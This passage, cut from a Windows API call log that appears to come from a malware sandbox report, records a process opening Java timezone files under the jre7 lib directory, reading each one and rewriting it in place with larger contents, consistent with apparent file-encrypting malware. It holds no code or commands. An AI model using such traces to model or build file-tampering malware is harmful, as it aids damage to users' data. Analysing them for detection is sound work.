hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x35a0 [0129.429] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0129.430] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0129.430] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0129.430] CloseHandle (hObject=0x1f0) returned 1 [0129.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.432] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb5 [0129.432] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.432] ReleaseMutex (hMutex=0x168) returned 1 [0129.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accra", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accra", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accra", lpUsedDefaultChar=0x0) returned 5 [0129.432] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ee0918, nNumberOfBytesToRead=0xb5, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0918*, lpNumberOfBytesRead=0x359f2bc*=0xb5, lpOverlapped=0x0) returned 1 [0129.433] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.433] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x63d, lpOverlapped=0x0) returned 1 [0129.434] CloseHandle (hObject=0x1f0) returned 1 [0129.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41 [0129.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.436] ReleaseMutex (hMutex=0x168) returned 1 [0129.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blantyre", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Blantyre", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blantyre", lpUsedDefaultChar=0x0) returned 8 [0129.436] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x359f2bc*=0x41, lpOverlapped=0x0) returned 1 [0129.437] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.437] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0129.438] CloseHandle (hObject=0x1f0) returned 1 [0129.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.439] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.439] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x55 [0129.439] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.439] ReleaseMutex (hMutex=0x168) returned 1 [0129.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dar_es_Salaam", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dar_es_Salaam", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dar_es_Salaam", lpUsedDefaultChar=0x0) returned 13 [0129.439] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x359f2bc*=0x55, lpOverlapped=0x0) returned 1 [0129.441] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.441] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0129.442] CloseHandle (hObject=0x1f0) returned 1 [0129.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.444] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.444] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x151 [0129.444] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.444] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.445] ReleaseMutex (hMutex=0x168) returned 1 [0129.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Juba", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0129.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Juba", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Juba", lpUsedDefaultChar=0x0) returned 4 [0129.445] ReadFile (in: hFile=0x1f0, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x151, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x359f2bc*=0x151, lpOverlapped=0x0) returned 1 [0129.446] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.446] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6d9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x359f2d0*=0x6d9, lpOverlapped=0x0) returned 1 [0129.447] CloseHandle (hObject=0x1f0) returned 1 [0129.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.448] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.448] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41 [0129.449] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.449] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.449] ReleaseMutex (hMutex=0x168) returned 1 [0129.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Luanda", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Luanda", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Luanda", lpUsedDefaultChar=0x0) returned 6 [0129.449] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x359f2bc*=0x41, lpOverlapped=0x0) returned 1 [0129.450] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.451] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0129.451] CloseHandle (hObject=0x1f0) returned 1 [0129.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.452] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.452] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4d [0129.452] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.453] ReleaseMutex (hMutex=0x168) returned 1 [0129.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monrovia", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monrovia", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Monrovia", lpUsedDefaultChar=0x0) returned 8 [0129.453] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f9fd08, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd08*, lpNumberOfBytesRead=0x359f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0129.454] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.455] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0129.455] CloseHandle (hObject=0x1f0) returned 1 [0129.455] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2dc [0129.456] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.457] ReleaseMutex (hMutex=0x168) returned 1 [0129.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tripoli", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tripoli", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tripoli", lpUsedDefaultChar=0x0) returned 7 [0129.457] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x2dc, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x359f2bc*=0x2dc, lpOverlapped=0x0) returned 1 [0129.458] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0129.459] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x864, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x359f2d0*=0x864, lpOverlapped=0x0) returned 1 [0129.459] CloseHandle (hObject=0x1f0) returned 1 [0129.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0129.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x225 [0129.460] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0129.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.461] ReleaseMutex (hMutex=0x168) returned 1 [0129.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Buenos_Aires", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Buenos_Aires", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Buenos_Aires", lpUsedDefaultChar=0x0) returned 12 [0129.461] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x359f2bc*=0x225, lpOverlapped=0x0) returned 1 [0130.781] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0130.781] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7ad, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x359f2d0*=0x7ad, lpOverlapped=0x0) returned 1 [0130.781] CloseHandle (hObject=0x1f0) returned 1 [0130.943] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.588] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0131.588] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x22d [0131.589] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0131.589] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.589] ReleaseMutex (hMutex=0x168) returned 1 [0131.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="San_Juan", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="San_Juan", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="San_Juan", lpUsedDefaultChar=0x0) returned 8 [0131.589] ReadFile (in: hFile=0x20c, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x22d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x359f2bc*=0x22d, lpOverlapped=0x0) returned 1 [0131.590] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0131.591] WriteFile (in: hFile=0x20c, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7b5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x359f2d0*=0x7b5, lpOverlapped=0x0) returned 1 [0131.591] CloseHandle (hObject=0x20c) returned 1 [0131.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0133.303] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0135.751] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x34c [0135.751] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0135.751] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.752] ReleaseMutex (hMutex=0x168) returned 1 [0135.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bahia_Banderas", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bahia_Banderas", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bahia_Banderas", lpUsedDefaultChar=0x0) returned 14 [0135.752] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e960f8, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e960f8*, lpNumberOfBytesRead=0x359f2bc*=0x34c, lpOverlapped=0x0) returned 1 [0135.964] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0135.965] WriteFile (in: hFile=0x1cc, lpBuffer=0x28902b8*, nNumberOfBytesToWrite=0x8d4, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28902b8*, lpNumberOfBytesWritten=0x359f2d0*=0x8d4, lpOverlapped=0x0) returned 1 [0135.965] CloseHandle (hObject=0x1cc) returned 1 [0135.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0135.966] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0135.967] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x434 [0135.967] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0135.967] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.967] ReleaseMutex (hMutex=0x168) returned 1 [0135.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cambridge_Bay", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 